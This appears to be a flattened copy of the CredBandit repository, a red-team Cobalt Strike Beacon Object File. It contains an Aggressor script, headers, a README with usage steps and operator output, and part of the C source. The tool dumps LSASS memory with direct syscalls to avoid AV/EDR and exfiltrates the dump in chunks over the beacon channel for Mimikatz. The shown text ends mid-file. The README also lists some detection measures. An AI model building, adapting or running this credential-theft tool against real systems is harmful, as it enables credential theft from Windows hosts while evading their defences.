├── credBandit ├── credBanditx64.o └── MiniDumpWriteDump.cna ├── src ├── beacon.h ├── syscalls.h ├── credBandit.h ├── credBandit.c └── syscalls-asm.h └── README.md /credBandit/credBanditx64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xforcered/CredBandit/HEAD/credBandit/credBanditx64.o -------------------------------------------------------------------------------- /credBandit/MiniDumpWriteDump.cna: -------------------------------------------------------------------------------- 1 | #Register command 2 | beacon_command_register( 3 | "credBandit", 4 | "runs an all in memory custom MiniDumpWriteDump implementation using static x64 syscalls and exfiltrates the data back through your beacon or can write to disk.", 5 | "Synopsis: credBandit [download name]" 6 | ); 7 | 8 | alias credBandit { 9 | local('$barch $handle $data $args $target_pid'); 10 | println(@_); 11 | # figure out the arch of this session 12 | $barch = barch($1); 13 | # read in the right BOF file 14 | $handle = openf(script_resource("credBandit $+ $barch $+ .o")); 15 | $data = readb($handle, -1); 16 | closef($handle); 17 | if(size(@_) == 2) 18 | { 19 | # pack just the pid 20 | $args = bof_pack($1, "i", $2); 21 | } else if (size(@_) == 3){ 22 | # pack the pid and the file name to save as 23 | $args = bof_pack($1, "izi", $2, $3, strlen($3)); 24 | } else { 25 | berror($1, "Incorrect usage!"); 26 | berror($1, beacon_command_detail("credBandit")); 27 | return; 28 | } 29 | 30 | # announce what we're doing 31 | btask($1, "Running credBandit by (@anthemtotheego)", "T1003"); 32 | # execute it. 33 | beacon_inline_execute($1, $data, "go", $args); 34 | } 35 | -------------------------------------------------------------------------------- /src/beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 6 | * 7 | * Cobalt Strike 4.1. 8 | */ 9 | 10 | /* data API */ 11 | typedef struct { 12 | char* original; /* the original buffer [so we can free it] */ 13 | char* buffer; /* current pointer into our buffer */ 14 | int length; /* remaining length of data */ 15 | int size; /* total size of this buffer */ 16 | } datap; 17 | 18 | DECLSPEC_IMPORT void BeaconDataParse(datap* parser, char* buffer, int size); 19 | DECLSPEC_IMPORT int BeaconDataInt(datap* parser); 20 | DECLSPEC_IMPORT short BeaconDataShort(datap* parser); 21 | DECLSPEC_IMPORT int BeaconDataLength(datap* parser); 22 | DECLSPEC_IMPORT char* BeaconDataExtract(datap* parser, int* size); 23 | 24 | /* format API */ 25 | typedef struct { 26 | char* original; /* the original buffer [so we can free it] */ 27 | char* buffer; /* current pointer into our buffer */ 28 | int length; /* remaining length of data */ 29 | int size; /* total size of this buffer */ 30 | } formatp; 31 | 32 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp* format, int maxsz); 33 | DECLSPEC_IMPORT void BeaconFormatReset(formatp* format); 34 | DECLSPEC_IMPORT void BeaconFormatFree(formatp* format); 35 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp* format, char* text, int len); 36 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp* format, char* fmt, ...); 37 | DECLSPEC_IMPORT char* BeaconFormatToString(formatp* format, int* size); 38 | DECLSPEC_IMPORT void BeaconFormatInt(formatp* format, int value); 39 | 40 | /* Output Functions */ 41 | #define CALLBACK_OUTPUT 0x0 42 | #define CALLBACK_OUTPUT_OEM 0x1e 43 | #define CALLBACK_ERROR 0x0d 44 | #define CALLBACK_OUTPUT_UTF8 0x20 45 | #define CALLBACK_FILE 0x02 46 | #define CALLBACK_FILE_WRITE 0x08 47 | #define CALLBACK_FILE_CLOSE 0x09 48 | 49 | DECLSPEC_IMPORT void BeaconPrintf(int type, char* fmt, ...); 50 | DECLSPEC_IMPORT void BeaconOutput(int type, char* data, int len); 51 | 52 | /* Token Functions */ 53 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 54 | DECLSPEC_IMPORT void BeaconRevertToken(); 55 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 56 | 57 | /* Spawn+Inject Functions */ 58 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char* buffer, int length); 59 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char* payload, int p_len, int p_offset, char* arg, int a_len); 60 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION* pInfo, char* payload, int p_len, int p_offset, char* arg, int a_len); 61 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION* pInfo); 62 | 63 | /* Utility Functions */ 64 | DECLSPEC_IMPORT BOOL toWideChar(char* src, wchar_t* dst, int max); 65 | -------------------------------------------------------------------------------- /src/syscalls.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "syscalls-asm.h" 5 | 6 | #ifndef InitializeObjectAttributes 7 | #define InitializeObjectAttributes( p, n, a, r, s ) { \ 8 | (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \ 9 | (p)->RootDirectory = r; \ 10 | (p)->Attributes = a; \ 11 | (p)->ObjectName = n; \ 12 | (p)->SecurityDescriptor = s; \ 13 | (p)->SecurityQualityOfService = NULL; \ 14 | } 15 | #endif 16 | 17 | typedef enum _SECTION_INHERIT 18 | { 19 | ViewShare = 1, 20 | ViewUnmap = 2 21 | } SECTION_INHERIT, *PSECTION_INHERIT; 22 | 23 | EXTERN_C NTSTATUS NtReadVirtualMemory( 24 | IN HANDLE ProcessHandle, 25 | IN PVOID BaseAddress OPTIONAL, 26 | OUT PVOID Buffer, 27 | IN SIZE_T BufferSize, 28 | OUT PSIZE_T NumberOfBytesRead OPTIONAL); 29 | 30 | EXTERN_C NTSTATUS NtOpenProcessToken( 31 | IN HANDLE ProcessHandle, 32 | IN ACCESS_MASK DesiredAccess, 33 | OUT PHANDLE TokenHandle); 34 | 35 | EXTERN_C NTSTATUS NtAdjustPrivilegesToken( 36 | IN HANDLE TokenHandle, 37 | IN BOOLEAN DisableAllPrivileges, 38 | IN PTOKEN_PRIVILEGES NewState OPTIONAL, 39 | IN ULONG BufferLength, 40 | OUT PTOKEN_PRIVILEGES PreviousState OPTIONAL, 41 | OUT PULONG ReturnLength OPTIONAL); 42 | 43 | EXTERN_C NTSTATUS NtOpenProcess( 44 | OUT PHANDLE ProcessHandle, 45 | IN ACCESS_MASK DesiredAccess, 46 | IN POBJECT_ATTRIBUTES ObjectAttributes, 47 | IN PCLIENT_ID ClientId OPTIONAL); 48 | 49 | EXTERN_C NTSTATUS NtClose( 50 | IN HANDLE Handle); 51 | 52 | EXTERN_C NTSTATUS NtQuerySystemInformation( 53 | IN SYSTEM_INFORMATION_CLASS SystemInformationClass, 54 | IN OUT PVOID SystemInformation, 55 | IN ULONG SystemInformationLength, 56 | OUT PULONG ReturnLength OPTIONAL); 57 | 58 | EXTERN_C NTSTATUS NtMapViewOfSection( 59 | IN HANDLE SectionHandle, 60 | IN HANDLE ProcessHandle, 61 | IN OUT PVOID BaseAddress, 62 | IN ULONG ZeroBits, 63 | IN SIZE_T CommitSize, 64 | IN OUT PLARGE_INTEGER SectionOffset OPTIONAL, 65 | IN OUT PSIZE_T ViewSize, 66 | IN SECTION_INHERIT InheritDisposition, 67 | IN ULONG AllocationType, 68 | IN ULONG Win32Protect); 69 | 70 | EXTERN_C NTSTATUS NtCreateSection( 71 | OUT PHANDLE SectionHandle, 72 | IN ACCESS_MASK DesiredAccess, 73 | IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, 74 | IN PLARGE_INTEGER MaximumSize OPTIONAL, 75 | IN ULONG SectionPageProtection, 76 | IN ULONG AllocationAttributes, 77 | IN HANDLE FileHandle OPTIONAL); 78 | 79 | EXTERN_C NTSTATUS NtCreateTransaction( 80 | OUT PHANDLE TransactionHandle, 81 | IN ACCESS_MASK DesiredAccess, 82 | IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, 83 | IN LPGUID Uow OPTIONAL, 84 | IN HANDLE TmHandle OPTIONAL, 85 | IN ULONG CreateOptions OPTIONAL, 86 | IN ULONG IsolationLevel OPTIONAL, 87 | IN ULONG IsolationFlags OPTIONAL, 88 | IN PLARGE_INTEGER Timeout OPTIONAL, 89 | IN PUNICODE_STRING Description OPTIONAL); 90 | 91 | 92 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CredBandit 2 | 3 | CredBandit is a proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel. The memory dump is done by using NTFS transactions which allows us to write the dump to memory and the MiniDumpWriteDump API has been replaced with an adaptation of ReactOS's implementation of MiniDumpWriteDump. 4 | 5 | The memory dump is then downloaded over the beacon with Beacon's native download functionality. The advantage of doing it this way is that the dump is never written to disk and is sent via your already established C2 channel. 6 | 7 | # Subject References 8 | This tool wouldn't exist without being able to piggyback off some really great research, tools, and code already published by members of the security community. So thank you. Lastly, if you feel anyone has been left out below, please let me know and I will be sure to get them added. 9 | - Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR (by [@Cneelis](https://twitter.com/Cneelis)) - [here](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/) 10 | - Direct Syscalls in Beacon Object Files (by [@Cneelis](https://twitter.com/Cneelis)) - [here](https://outflank.nl/blog/2020/12/26/direct-syscalls-in-beacon-object-files/) 11 | - TransactedSharpMiniDump - [here](https://github.com/PorLaCola25/TransactedSharpMiniDump) 12 | - rookuu/BOFS/MiniDumpWriteDump (by [@rookuu_](https://twitter.com/rookuu_))- [here](https://github.com/rookuu/BOFs/tree/main/MiniDumpWriteDump) - Did all the heavy lifting for converting the ReactOS minidump.c to BOF compatible code 13 | - SysWhispers (by [@Jackson_T](https://twitter.com/Jackson_T))- [here](https://github.com/jthuraisamy/SysWhispers) 14 | - InlineWhsipers - [here](https://github.com/outflanknl/InlineWhispers) 15 | - ([@ilove2pwn_](https://twitter.com/ilove2pwn_)) - Confirmed my original idea of the possibility of being able to use BeaconPrintf() function to send data back through CS, helped me get started with writing/understanding the amazing (insert == sarcasm) sleep language. I also borrowed and modified little bit of logic for chunking data in C [here](https://gist.github.com/SecIdiot/82e4162e495602f064aba5b42575da5e) 16 | - ([@BinaryFaultline](https://twitter.com/BinaryFaultline)) - Added the ability to use beacon's native download functionality 17 | - ([@Cr0Eax](https://twitter.com/Cr0Eax]) and [@_EthicalChaos_](https://twitter.com/_EthicalChaos_)) - Initial discovery and usage of Beacon's native download functionality. See their tweets about it: https://twitter.com/_EthicalChaos_/status/1413229432219779074?s=20 and https://twitter.com/Cr0Eax/status/1412761297951739907?s=20 18 | 19 | ## Getting Started 20 | 21 | 1. Copy the credBandit folder with all of its contents and place it a directory just above your cobaltstrike folder on whatever system you plan to connect with via the GUI application. 22 | 2. Load in the MiniDumpWriteDump.cna Aggressor script 23 | 3. Run credBandit against target LSASS process (or other process) 24 | 4. Download the dump file from the Aggressor Downloads console 25 | 6. Use Mimikatz to extract the dump file 26 | 27 | ### Build Your Own 28 | 29 | Run the below command inside the src directory 30 | ``` 31 | x86_64-w64-mingw32-gcc -o credBanditx64.o -c credBandit.c -masm=intel 32 | ``` 33 | 34 | ### Use Case 35 | 36 | > *With High or SYSTEM integrity, the operator can perform a memory dump of LSASS without ever touching disk* 37 | 38 | ### Syntax 39 | 40 | Perform memory dump and send back through CS using BeaconPrintf function. The second parameter of output name is optional and will show up in the Aggressor Downloads console as mem:\\[output].dmp 41 | 42 | ``` 43 | beacon> credBandit 708 output 44 | [*] Running credBandit by (@anthemtotheego) 45 | [+] host called home, sent: 18696 bytes 46 | [+] received output: 47 | [+] Attempting To Enable Debug Privs 48 | 49 | [+] received output: 50 | [+] Attempting To Dump Proccess 708 51 | 52 | [+] received output: 53 | [+] NtOpenProcess returned HANDLE 0x00000000000006CC 54 | 55 | [+] received output: 56 | [+] NtCreateTransaction returned HANDLE 0x00000000000006D4 57 | 58 | [+] received output: 59 | [+] RtlSetCurrentTransaction successfully set 60 | 61 | [+] received output: 62 | [+] NtCreateFile returned HANDLE 0x00000000000006D8 63 | 64 | [+] received output: 65 | [+] RtlSetCurrentTransaction successfully set 66 | 67 | [+] received output: 68 | [+] OS Version: 10.0.19042 69 | 70 | [+] received output: 71 | [+] MiniDump written to memory 72 | 73 | [+] received output: 74 | [+] MiniDump Size In Bytes = 109868198 75 | 76 | [+] received output: 77 | [+] NtCreateSection created 78 | 79 | [+] received output: 80 | [+] NtMapViewOfSection successful 81 | 82 | [*] started download of mem:\output.dmp (109868198 bytes) 83 | [*] download of output.dmp is complete 84 | ``` 85 | 86 | ## Caveats 87 | 88 | 1. While I have tried to make this pretty stable, Although this method has become more stable with the download method, BOFs still carry the risk of causing a beacon to crash. Use at your own risk. 89 | 2. Since the BOF is executed in process and takes over the beacon while running, sleep time is not relevant. Data will be continously sent while dump is exfiltrated. 90 | 3. Lastly, I commented in the code places where you could make modifications if you wanted to do other stuff, for example, write to disk instead, add in different encoding/encryption, Comms, etc. 91 | 92 | ## Detection 93 | 94 | Some detection and mitigation strategies that could be used: 95 | 96 | 1. Credential Guard [here](https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-manage) 97 | 2. Event Tracing [here](https://docs.microsoft.com/en-us/windows/win32/etw/about-event-tracing) 98 | 3. Looking for suspicious processes touching LSASS 99 | 4. Looking for other known Cobalt Strike Beacon IOC's or C2 egress/communication IOC's. 100 | -------------------------------------------------------------------------------- /src/credBandit.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | #define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 ) 6 | #define STATUS_SUCCESS 0 7 | #define intAlloc(size) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size) 8 | #define FILE_OVERWRITE_IF 0x00000005 9 | #define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020 10 | #define FILE_CREATE 0x00000002 11 | #define FILE_NON_DIRECTORY_FILE 0x00000040 12 | #define OBJ_CASE_INSENSITIVE 0x00000040L 13 | #define ARRAY_SIZE(a) (sizeof(a)/sizeof((a)[0])) 14 | 15 | WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap(); 16 | WINBASEAPI void * WINAPI KERNEL32$HeapAlloc (HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes); 17 | WINBASEAPI LPVOID WINAPI KERNEL32$HeapReAlloc (HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes); 18 | WINBASEAPI BOOL WINAPI KERNEL32$HeapFree (HANDLE, DWORD, PVOID); 19 | WINBASEAPI int WINAPI KERNEL32$lstrlenW (LPCWSTR lpString); 20 | WINBASEAPI LPWSTR WINAPI KERNEL32$lstrcpyW (LPWSTR lpString1, LPCWSTR lpString2); 21 | WINBASEAPI DWORD WINAPI KERNEL32$GetLastError (VOID); 22 | WINBASEAPI HANDLE WINAPI KERNEL32$GetCurrentProcess (VOID); 23 | WINBASEAPI DWORD WINAPI KERNEL32$SetFilePointer(HANDLE hFile, LONG lDistanceToMove, PLONG lpDistanceToMoveHigh, DWORD dwMoveMethod); 24 | WINBASEAPI BOOL WINAPI KERNEL32$SetFilePointerEx(HANDLE hFile, LARGE_INTEGER liDistanceToMove, PLARGE_INTEGER lpDistanceToMoveHigh, DWORD dwMoveMethod); 25 | WINBASEAPI BOOL WINAPI KERNEL32$WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped); 26 | WINBASEAPI void WINAPI KERNEL32$GetSystemInfo(LPSYSTEM_INFO lpSystemInfo); 27 | WINBASEAPI BOOL WINAPI KERNEL32$IsProcessorFeaturePresent(DWORD ProcessorFeature); 28 | WINBASEAPI BOOL WINAPI KERNEL32$GetFileSizeEx(HANDLE hFile, PLARGE_INTEGER lpFileSize); 29 | WINBASEAPI SIZE_T WINAPI KERNEL32$VirtualQueryEx(HANDLE hProcess, LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength); 30 | WINBASEAPI HANDLE WINAPI KERNEL32$CreateFileA (LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile); 31 | WINBASEAPI DWORD WINAPI KERNEL32$GetProcessId(HANDLE Process); 32 | WINBASEAPI BOOL WINAPI KERNEL32$ReadProcessMemory(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead); 33 | WINBASEAPI VOID WINAPI KERNEL32$Sleep (DWORD dwMilliseconds); 34 | WINBASEAPI void *__cdecl MSVCRT$memcpy(void * __restrict__ _Dst,const void * __restrict__ _Src,size_t _MaxCount); 35 | WINBASEAPI void __cdecl MSVCRT$memset(void *dest, int c, size_t count); 36 | WINBASEAPI void* WINAPI MSVCRT$malloc(SIZE_T); 37 | DECLSPEC_IMPORT int __cdecl MSVCRT$strcmp(const char *_Str1,const char *_Str2); 38 | WINBASEAPI void* WINAPI MSVCRT$free(void*); 39 | WINBASEAPI BOOL IMAGEAPI DBGHELP$EnumerateLoadedModulesW64(HANDLE hProcess, PENUMLOADED_MODULES_CALLBACKW64 EnumLoadedModulesCallback, PVOID UserContext); 40 | WINBASEAPI BOOL IMAGEAPI DBGHELP$SymInitializeW(HANDLE hProcess, PCWSTR UserSearchPath, BOOL fInvadeProcess); 41 | WINBASEAPI BOOL IMAGEAPI DBGHELP$SymCleanup(HANDLE hProcess); 42 | WINADVAPI BOOL WINAPI ADVAPI32$LookupPrivilegeValueW(LPCWSTR lpSystemName, LPCWSTR lpName, PLUID lpLuid); 43 | DECLSPEC_IMPORT DWORD WINAPI PSAPI$GetModuleFileNameExW(HANDLE hProcess, HMODULE hModule, LPWSTR lpFilename, DWORD nSize); 44 | DECLSPEC_IMPORT DWORD WINAPI VERSION$GetFileVersionInfoSizeW(LPCWSTR lptstrFilenamea ,LPDWORD lpdwHandle); 45 | DECLSPEC_IMPORT WINBOOL WINAPI VERSION$GetFileVersionInfoW(LPCWSTR lptstrFilename, DWORD dwHandle, DWORD dwLen, LPVOID lpData); 46 | DECLSPEC_IMPORT WINBOOL WINAPI VERSION$VerQueryValueW(LPCVOID pBlock, LPCWSTR lpSubBlock, LPVOID *lplpBuffer, PUINT puLen); 47 | WINADVAPI WINBOOL WINAPI ADVAPI32$LookupPrivilegeValueW(LPCWSTR lpSystemName, LPCWSTR lpName, PLUID lpLuid); 48 | WINBASEAPI void WINAPI MSVCRT$srand(int initial); 49 | WINBASEAPI int WINAPI MSVCRT$rand(); 50 | WINBASEAPI time_t WINAPI MSVCRT$time(time_t *time); 51 | WINBASEAPI void WINAPI MSVCRT$sprintf(char*, char[], ...); 52 | WINBASEAPI int __cdecl MSVCRT$_snprintf(char* s, size_t n, const char* fmt, ...); 53 | 54 | typedef void (WINAPI* _RtlInitUnicodeString) (PUNICODE_STRING DestinationString, PCWSTR SourceString); 55 | typedef NTSTATUS (WINAPI* _RtlSetCurrentTransaction) (PHANDLE); 56 | 57 | typedef struct _THREAD_BASIC_INFORMATION 58 | { 59 | NTSTATUS ExitStatus; 60 | PVOID TebBaseAddress; 61 | CLIENT_ID ClientId; 62 | KAFFINITY AffinityMask; 63 | KPRIORITY Priority; 64 | KPRIORITY BasePriority; 65 | } THREAD_BASIC_INFORMATION, * PTHREAD_BASIC_INFORMATION; 66 | 67 | typedef DWORD RVA; 68 | typedef ULONG64 RVA64; 69 | 70 | struct process 71 | { 72 | struct process* next; 73 | HANDLE handle; 74 | const struct loader_ops* loader; 75 | WCHAR* search_path; 76 | WCHAR* environment; 77 | 78 | PSYMBOL_REGISTERED_CALLBACK64 reg_cb; 79 | PSYMBOL_REGISTERED_CALLBACK reg_cb32; 80 | BOOL reg_is_unicode; 81 | DWORD64 reg_user; 82 | 83 | struct module* lmodules; 84 | ULONG_PTR dbg_hdr_addr; 85 | 86 | IMAGEHLP_STACK_FRAME ctx_frame; 87 | 88 | unsigned buffer_size; 89 | void* buffer; 90 | 91 | BOOL is_64bit; 92 | }; 93 | 94 | struct dump_context 95 | { 96 | /* process & thread information */ 97 | struct process* process; 98 | DWORD pid; 99 | HANDLE handle; 100 | unsigned flags_out; 101 | /* thread information */ 102 | struct dump_thread* threads; 103 | unsigned num_threads; 104 | /* module information */ 105 | struct dump_module* modules; 106 | unsigned num_modules; 107 | unsigned alloc_modules; 108 | /* exception information */ 109 | /* output information */ 110 | MINIDUMP_TYPE type; 111 | HANDLE hFile; 112 | RVA rva; 113 | struct dump_memory* mem; 114 | unsigned num_mem; 115 | unsigned alloc_mem; 116 | struct dump_memory64* mem64; 117 | unsigned num_mem64; 118 | unsigned alloc_mem64; 119 | /* callback information */ 120 | MINIDUMP_CALLBACK_INFORMATION* cb; 121 | }; 122 | 123 | struct line_info 124 | { 125 | ULONG_PTR is_first : 1, 126 | is_last : 1, 127 | is_source_file : 1, 128 | line_number; 129 | union 130 | { 131 | ULONG_PTR pc_offset; /* if is_source_file isn't set */ 132 | unsigned source_file; /* if is_source_file is set */ 133 | } u; 134 | }; 135 | 136 | struct module_pair 137 | { 138 | struct process* pcs; 139 | struct module* requested; /* in: to module_get_debug() */ 140 | struct module* effective; /* out: module with debug info */ 141 | }; 142 | 143 | enum pdb_kind { PDB_JG, PDB_DS }; 144 | 145 | struct pdb_lookup 146 | { 147 | const char* filename; 148 | enum pdb_kind kind; 149 | DWORD age; 150 | DWORD timestamp; 151 | GUID guid; 152 | }; 153 | 154 | struct cpu_stack_walk 155 | { 156 | HANDLE hProcess; 157 | HANDLE hThread; 158 | BOOL is32; 159 | struct cpu* cpu; 160 | union 161 | { 162 | struct 163 | { 164 | PREAD_PROCESS_MEMORY_ROUTINE f_read_mem; 165 | PTRANSLATE_ADDRESS_ROUTINE f_xlat_adr; 166 | PFUNCTION_TABLE_ACCESS_ROUTINE f_tabl_acs; 167 | PGET_MODULE_BASE_ROUTINE f_modl_bas; 168 | } s32; 169 | struct 170 | { 171 | PREAD_PROCESS_MEMORY_ROUTINE64 f_read_mem; 172 | PTRANSLATE_ADDRESS_ROUTINE64 f_xlat_adr; 173 | PFUNCTION_TABLE_ACCESS_ROUTINE64 f_tabl_acs; 174 | PGET_MODULE_BASE_ROUTINE64 f_modl_bas; 175 | } s64; 176 | } u; 177 | }; 178 | 179 | struct dump_memory 180 | { 181 | ULONG64 base; 182 | ULONG size; 183 | ULONG rva; 184 | }; 185 | 186 | struct dump_memory64 187 | { 188 | ULONG64 base; 189 | ULONG64 size; 190 | }; 191 | 192 | struct dump_module 193 | { 194 | unsigned is_elf; 195 | ULONG64 base; 196 | ULONG size; 197 | DWORD timestamp; 198 | DWORD checksum; 199 | WCHAR name[MAX_PATH]; 200 | }; 201 | 202 | struct dump_thread 203 | { 204 | ULONG tid; 205 | ULONG prio_class; 206 | ULONG curr_prio; 207 | }; 208 | -------------------------------------------------------------------------------- /src/credBandit.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "credBandit.h" 6 | #include "syscalls.h" 7 | #include "beacon.h" 8 | 9 | /*Download File*/ 10 | void downloadFile(char* fileName, int downloadFileNameLength, char* returnData, int fileSize) { 11 | 12 | //Intializes random number generator to create fileId 13 | time_t t; 14 | MSVCRT$srand((unsigned)MSVCRT$time(&t)); 15 | int fileId = MSVCRT$rand(); 16 | 17 | //8 bytes for fileId and fileSize 18 | int messageLength = downloadFileNameLength + 8; 19 | char* packedData = (char*)MSVCRT$malloc(messageLength); 20 | 21 | //pack on fileId as 4-byte int first 22 | packedData[0] = (fileId >> 24) & 0xFF; 23 | packedData[1] = (fileId >> 16) & 0xFF; 24 | packedData[2] = (fileId >> 8) & 0xFF; 25 | packedData[3] = fileId & 0xFF; 26 | 27 | //pack on fileSize as 4-byte int second 28 | packedData[4] = (fileSize >> 24) & 0xFF; 29 | packedData[5] = (fileSize >> 16) & 0xFF; 30 | packedData[6] = (fileSize >> 8) & 0xFF; 31 | packedData[7] = fileSize & 0xFF; 32 | 33 | int packedIndex = 8; 34 | 35 | //pack on the file name last 36 | for (int i = 0; i < downloadFileNameLength; i++) { 37 | packedData[packedIndex] = fileName[i]; 38 | packedIndex++; 39 | } 40 | 41 | BeaconOutput(CALLBACK_FILE, packedData, messageLength); 42 | 43 | if (fileSize > (1024 * 900)){ 44 | 45 | //Lets see how many times this constant goes into our file size, then add one (because if it doesn't go in at all, we still have one chunk) 46 | int numOfChunks = (fileSize / (1024 * 900)) + 1; 47 | int index = 0; 48 | int chunkSize = 1024 * 900; 49 | 50 | while(index < fileSize) { 51 | if (fileSize - index > chunkSize){//We have plenty of room, grab the chunk and move on 52 | 53 | /*First 4 are the fileId 54 | then account for length of file 55 | then a byte for the good-measure null byte to be included 56 | then lastly is the 4-byte int of the fileSize*/ 57 | int chunkLength = 4 + chunkSize; 58 | char* packedChunk = (char*) MSVCRT$malloc(chunkLength); 59 | 60 | //pack on fileId as 4-byte int first 61 | packedChunk[0] = (fileId >> 24) & 0xFF; 62 | packedChunk[1] = (fileId >> 16) & 0xFF; 63 | packedChunk[2] = (fileId >> 8) & 0xFF; 64 | packedChunk[3] = fileId & 0xFF; 65 | 66 | int chunkIndex = 4; 67 | 68 | //pack on the file name last 69 | for (int i = index; i < index + chunkSize; i++) { 70 | packedChunk[chunkIndex] = returnData[i]; 71 | chunkIndex++; 72 | } 73 | 74 | BeaconOutput(CALLBACK_FILE_WRITE, packedChunk, chunkLength); 75 | 76 | } else {//This chunk is smaller than the chunkSize, so we have to be careful with our measurements 77 | 78 | int lastChunkLength = fileSize - index + 4; 79 | char* lastChunk = (char*) MSVCRT$malloc(lastChunkLength); 80 | 81 | //pack on fileId as 4-byte int first 82 | lastChunk[0] = (fileId >> 24) & 0xFF; 83 | lastChunk[1] = (fileId >> 16) & 0xFF; 84 | lastChunk[2] = (fileId >> 8) & 0xFF; 85 | lastChunk[3] = fileId & 0xFF; 86 | int lastChunkIndex = 4; 87 | 88 | //pack on the file name last 89 | for (int i = index; i < fileSize; i++) { 90 | lastChunk[lastChunkIndex] = returnData[i]; 91 | lastChunkIndex++; 92 | } 93 | BeaconOutput(CALLBACK_FILE_WRITE, lastChunk, lastChunkLength); 94 | } 95 | 96 | index = index + chunkSize; 97 | 98 | } 99 | 100 | } else { 101 | 102 | /*first 4 are the fileId 103 | then account for length of file 104 | then a byte for the good-measure null byte to be included 105 | then lastly is the 4-byte int of the fileSize*/ 106 | int chunkLength = 4 + fileSize; 107 | char* packedChunk = (char*) MSVCRT$malloc(chunkLength); 108 | 109 | //pack on fileId as 4-byte int first 110 | packedChunk[0] = (fileId >> 24) & 0xFF; 111 | packedChunk[1] = (fileId >> 16) & 0xFF; 112 | packedChunk[2] = (fileId >> 8) & 0xFF; 113 | packedChunk[3] = fileId & 0xFF; 114 | int chunkIndex = 4; 115 | 116 | //pack on the file name last 117 | for (int i = 0; i < fileSize; i++) { 118 | packedChunk[chunkIndex] = returnData[i]; 119 | chunkIndex++; 120 | } 121 | 122 | BeaconOutput(CALLBACK_FILE_WRITE, packedChunk, chunkLength); 123 | } 124 | 125 | 126 | //We need to tell the teamserver that we are done writing to this fileId 127 | char packedClose[4]; 128 | 129 | //pack on fileId as 4-byte int first 130 | packedClose[0] = (fileId >> 24) & 0xFF; 131 | packedClose[1] = (fileId >> 16) & 0xFF; 132 | packedClose[2] = (fileId >> 8) & 0xFF; 133 | packedClose[3] = fileId & 0xFF; 134 | BeaconOutput(CALLBACK_FILE_CLOSE, packedClose, 4); 135 | 136 | return; 137 | } 138 | 139 | /*Begin MiniDumpWriteDump reactOS Code*/ 140 | static BOOL fetch_process_info(struct dump_context* dc) 141 | { 142 | ULONG buf_size = 0x1000; 143 | NTSTATUS nts; 144 | SYSTEM_PROCESS_INFORMATION* pcs_buffer; 145 | 146 | if (!(pcs_buffer = (SYSTEM_PROCESS_INFORMATION*)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), 0, buf_size))) return FALSE; 147 | for (;;) 148 | { 149 | nts = NtQuerySystemInformation(SystemProcessInformation, 150 | pcs_buffer, buf_size, NULL); 151 | if (nts != 0xC0000004L) break; 152 | pcs_buffer = (SYSTEM_PROCESS_INFORMATION*)KERNEL32$HeapReAlloc(KERNEL32$GetProcessHeap(), 0, pcs_buffer, buf_size *= 2); 153 | if (!pcs_buffer) return FALSE; 154 | } 155 | 156 | if (nts == 0) 157 | { 158 | SYSTEM_PROCESS_INFORMATION* spi = pcs_buffer; 159 | 160 | for (;;) 161 | { 162 | if (HandleToUlong(spi->UniqueProcessId) == dc->pid) 163 | { 164 | dc->num_threads = spi->NumberOfThreads; 165 | dc->threads = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), 0, 166 | dc->num_threads * sizeof(dc->threads[0])); 167 | if (!dc->threads) goto failed; 168 | KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pcs_buffer); 169 | return TRUE; 170 | } 171 | if (!spi->NextEntryOffset) break; 172 | spi = (SYSTEM_PROCESS_INFORMATION*)((char*)spi + spi->NextEntryOffset); 173 | } 174 | } 175 | failed: 176 | KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pcs_buffer); 177 | return FALSE; 178 | } 179 | 180 | static void writeat(struct dump_context* dc, RVA rva, const void* data, unsigned size) 181 | { 182 | DWORD written; 183 | 184 | KERNEL32$SetFilePointer(dc->hFile, rva, NULL, FILE_BEGIN); 185 | KERNEL32$WriteFile(dc->hFile, data, size, &written, NULL); 186 